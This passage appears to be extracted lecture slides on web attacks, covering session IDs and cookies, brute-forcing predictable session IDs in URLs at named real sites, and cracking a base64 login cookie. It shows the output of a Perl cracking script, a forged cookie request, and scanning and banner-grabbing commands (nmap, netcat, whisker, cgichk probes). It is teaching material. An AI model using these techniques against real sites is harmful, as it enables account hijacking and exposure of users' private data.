•Session Replay– A traditional replay attack in the cryptography

sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.

•Session Hijacking– Seizing control of a legitimate user's web

application session while that user is “logged in” to the application

Page 100: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session IDSession ID

• Session ID should IN THEORY be just as secure as username/password

Page 101: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session ID OverviewSession ID Overview

• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).

Page 102: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session ID OverviewSession ID Overview

• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)

• Session ID generated by WEB SERVER (IIS, etc.) when the user first hits the site or by WEB APPLICATION (ATG dynamo, Apache Tomcat, BEA Websphere, .jsp, .asp, perl, etc.) when the user logs in

Page 103: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie RefresherCookie Refresher

• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies

• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)

• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g. , C:\Program files\netscape \users\username\cookies.txt for Netscape and C:\Documents and Settings \username\Cookies for IE on Win2K).

Page 104: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie RefresherCookie Refresher•Cookie Refresher (RFC 2965)

1.) domain: The website domain that created and that can read the variable. 2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can

access the variable.3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed

to access the variable. 5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the

number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006)

6.) name: The name of the Session ID variable (in this case Apache).

7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480 ) .

www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480

1 2 3 4 5 6 7

Page 105: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie Stored Session ID Cookie Stored Session ID ExamplesExamples

.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2

.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2

.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034

.ebay.com TRUE / FALSE 1183296824 lucky8 694036

.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie

13fe8fff4799f27dcf19c959dafa8437

.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl

.yahoo.com TRUE / FALSE 1154029490 PU t=1

Page 106: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Stored Session IDURL Stored Session ID

• http://www.123greetings.com/view/7AD30725122120803 • http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB • http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122

• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344

Page 107: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session IDs in HTML Session IDs in HTML Hidden FieldsHidden Fields

<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">

<input type="hidden" name="sessionID" value=”abcde1234”>

<input type="hidden" name="useraccount" value=”673-12745”>

<input type="submit" name="Access My Bank Information"></form>

Page 108: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Session ID Session ID SecuritySecurity Overview Overview

Session ID security is a microcosm of Web Application Security.

Web Application Security cuts through many different aspects of an organization’s information security infrastructure

Page 109: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

An Example: Brute Forcing Session An Example: Brute Forcing Session ID’s in URLSID’s in URLS

Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.) 

http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html

Page 110: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

An Example: Brute An Example: Brute Forcing Session ID’s in Forcing Session ID’s in

URLSURLShttp://www.123greetings.com/view/AD30725122116211

http://www.123greetings.com/view/AD30725122118909

http://www.123greetings.com/view/AD30725122120803

http://www.123greetings.com/view/AD30725122122507

http://www.123greetings.com/view/AD30725122124100

As we start to associate that the date we sent these electronic cards on was July 25 at 12:21 PST, we can start to eliminate some more entropy out of this session ID (07251221). Notice then that we’re left with five incrementing “random” digits at the end of the URL. http://www.123greetings.com/view/AD30725122116211http://www.123greetings.com/view/AD30725122118909http://www.123greetings.com/view/AD30725122120803http://www.123greetings.com/view/AD30725122122507http://www.123greetings.com/view/AD30725122124100

Page 111: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

An Example: Brute Forcing An Example: Brute Forcing Session ID’s in URLS Session ID’s in URLS AUTOMATED DEMO!AUTOMATED DEMO!

Page 112: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Why Brute Forcing Web Why Brute Forcing Web Session ID’s is BadSession ID’s is Bad

• Can result in an online user’s web application account being hijacked or loss of privacy

• Easy to exploit• Unlike typical login scenario, no failed login

lockout• Prevalent disclosure among security mailing lists• Typical security solutions (firewalls, IDS, etc.) do

nothing to detect attacks• Log data is usually not that detailed• IDS is not well developed for Web Application

attacks• SSL (Server side) does nothing to protect

against these attacks

Page 113: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

In the NewsIn the News– “Privacy hole found in Verizon

Wireless Web site “ Computerworld, Sept 6, 2001.http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.htmlhttp://online.securityfocus.com/archive/1/211520

– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION

Page 114: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Example: Brute Forcing URL Example: Brute Forcing Register.comRegister.com

 

Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below. http://mydomain.register.com/change_password.cgi?155218782787 Note: Above link will be expire within three days 

Page 115: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Example 2: Brute Forcing Web Example 2: Brute Forcing Web Session ID’sSession ID’s

http://mydomain.register.com/change_password.cgi?486218782865http://mydomain.register.com/change_password.cgi?440218782891 http://mydomain.register.com/change_password.cgi?685218782917 http://mydomain.register.com/change_password.cgi?505218782956 http://mydomain.register.com/change_password.cgi?435218782969

http://mydomain.register.com/change_password.cgi?486218782865 http://mydomain.register.com/change_password.cgi?440218782891http://mydomain.register.com/change_password.cgi?685218782917http://mydomain.register.com/change_password.cgi?505218782956http://mydomain.register.com/change_password.cgi?435218782969

Page 116: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com

-----Original Message-----

From: [email protected] [mailto:[email protected]]

Sent: Monday, July 01, 2002 1:38 PM

To: [email protected]

Subject: D.FILM Digital Movie for Dave

Dave created a digital movie for you!

You can view it at the following URL:

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

Cheers,

Dave and DFILM.

Be sure to check out the web site at http://www.dfilm.com

Page 117: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com

No privacy of other user’s creations:

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

http://mm.dfilm.com/mm2s/mm_route.php?id=110531

http://mm.dfilm.com/mm2s/mm_route.php?id=110530

http://mm.dfilm.com/mm2s/mm_route.php?id=110529

http://mm.dfilm.com/mm2s/mm_route.php?id=110528

http://mm.dfilm.com/mm2s/mm_route.php?id=110527

http://mm.dfilm.com/mm2s/mm_route.php?id=110526

http://mm.dfilm.com/mm2s/mm_route.php?id=…

Page 118: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Example – Sendomatic.comURL Example – Sendomatic.com

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330

Page 119: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

URL Example – Sendomatic.comURL Example – Sendomatic.comView other people’s events. Crash a party, edit an event, cancel and event, etc.

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336http://www.sendomatic.com/servlets/servlets/mysendo?uId=…

Page 120: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie Example – Freeservers.comCookie Example – Freeservers.com

Page 121: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie Example – Freeservers.comCookie Example – Freeservers.com

•LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;

• Base 64 decode the string: http://www.securitystats.com/tools/base64.asp

testing123.itgo.com:1231234 username:password

• Next, automate it with a perl exploit by feeding encoded strings in to the cookie

Page 122: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie Example – Freeservers.comCookie Example – Freeservers.com

%perl freeservershack.pltrying testtrying test123trying 123123trying 1231234 Cracked it! The password to testing123.itgo.com is 1231234

 GET http://testing123.itgo.com/cgi-bin/util/my_member_area

User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3DCookie2: $Version=1 %

Page 123: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie Example – Cookie Example – Freeservers.comFreeservers.com

• Or a much longer way: use the brute forcer on every single cookie character combination

Page 124: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Cookie/URL Example – Cookie/URL Example – Amazon.comAmazon.com

• Some sites use the URL AND Cookie for authentication:

Page 125: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

6 Common Problems6 Common Problems

• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.

• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.  

• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large.

 

Page 126: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

6 Common Problems – Continued6 Common Problems – Continued

• Indefinite Expiration on Server– Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.  

• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.

• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.

Page 127: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

ToolsTools

• Sessions Auditorwww.idefense.com/idtools/Session_Auditor.zip

• Visual Testing – WebSleuthwww.geocities.com/dzzie/sleuth

• WebProxy -www.atstake.com/research/tools/index.html

• HTTPush - httpush.sourceforge.net

• Achilles - www.digizen-security.com/downloads.html

• MiniBrowser - aignes.com/download.htm

Page 128: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

• Some good things:– Completeness– Large knowledge bases (at least possibly)

• Puts Web security assessment into the hands of anyone who calls themselves a “Information Security Expert”.

Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well

Page 129: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well

•Every programmer does things a little different

•Authentication schemes are hard to automate

•Error codes are not standardized•Sometimes simple things like SSL get in the

way

Page 130: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Why People are BetterWhy People are Better

•Recognition of subtle errors•We understand the impact and therefore

the risk of a vulnerability•We are grounded in the fundamentals of

Computer Science and therefore are able to find “real” bugs, flaws in logic

Page 131: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Web Hacking AccessoriesWeb Hacking Accessories

• Some helpful tools include….– A port scanner (Nmap et. al.)

www.insecure.org/nmap/

– Netcat; the network swiss army knife http://www.atstake.com/research/tools/network_utilities/

– A vulnerability scanner; Whisker http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm

– Open SSL source and documentation• OpenSSL, RFC 2246

Page 132: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

New tools on the New tools on the horizon…horizon…

New tools on the New tools on the horizon…horizon…

• Nikto– CGI scanner, similar to whisker 1.4. Checks for CGIs,

common dirs, and old versions Database frequently updated http://www.cirt.net/

• WHArsenal– Set of CGIs that plug into an existing Apache install. Allows

for all kinds of requests, while controling/modifying request particulars. http://community.whitehatsec.com/

• @stake WebProxy– Assessment proxy with full fuzzer/rewriting capabilities.

Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/

• Nessus– Has a few new interesting web assessment plugins which

do site crawling/mirroring and a few other interesting things. http://www.nessus.org/

Page 133: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Basic Training for Web Basic Training for Web Combat…Combat…

• Port scanning– Look for well-known TCP web ports.

• 80, 81, 443, 8000, 8080, etc…

• Using FScan (from Foundstone)fscan -p 80,81,443,8000,8080 10.0.0.1

• Using nmap (by Fyodor)nmap -p 80,81,443,8000,8080 10.0.0.1

Page 134: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Basic Training for Web Basic Training for Web Combat…Combat…

• Fingerprinting – HTTP Banner grabbing.– netcat as a TCP client (even telnet works)

nc 10.0.0.1 80

HEAD / HTTP/1.0

• Advanced HTTP methods:– TRACE, OPTIONS, etc.

Page 135: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Basic Training for Web Basic Training for Web Combat…Combat…

Shaking the tree for the low hanging fruit….

• Scan using a database of known web vulnerabilities.

• Whisker (by Rain Forest Puppy)./whisker.pl -h 10.0.0.1 -I 1

• cgichk.c<snip>"GET /cgi-bin/phf HTTP/1.0\n\n";"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";"GET /cgi-bin/test-cgi HTTP/1.0\n\n";"GET /cgi-bin/php.cgi HTTP/1.0\n\n

• ISS, Cybercop, Retina, etc.

Page 136: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

el33t hax0r Training for el33t hax0r Training for Web Combat…Web Combat…

What about SSL?

• Some SSL Myths:– “We are secure because we use SSL!”– “Strong 128 bit crypto being used”– “We use Digital Certificates signed by

VeriSign”

Page 137: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Proxy Over SSLProxy Over SSL• Using netcat and OpenSSL, it is possible

to create a simple two-line SSL Proxy!• Listen on port 80 on a host and redirect

requests to port 443 on a remote host through SSL.

SSLweb

server

Webclient

openssl

nc

Page 138: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Assessment ToolsAssessment Tools

• Vulnerability scanners– Look for a known list of vulnerable

applications or technologies– Do not (can not) engage/scan custom

applications and configurations– General vulnerability scanners: ISS,

Cybercop, Nessus– Web-specific vulnerability scanners:

WebInspect, whisker

Page 139: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Assessment toolsAssessment tools

• ‘Proxy monitors’– HTTP proxy which monitors traffic, looking

for web vulnerabilities as they pass– Can analyze custom applications with the

help of a user– Examples: AppScan, RFProxy,

HTTPush, Achilles

Page 140: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Root Causes of Web Root Causes of Web HacksHacks

• Complex web architectures may cause oversight in web server configuration.

• URL Parsing.• File Canonicalization.• Combination of underlying operating

system and web server may leave holes.

Page 141: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Root Causes of Web Root Causes of Web HacksHacks

• Untested code used in web applications, to save time.

• Level of security consciousness low in web application developers.

• Security vs. convenience.• Security vs. time-to-market.• Zero knowledge administration breeds

zero knowledge administrators.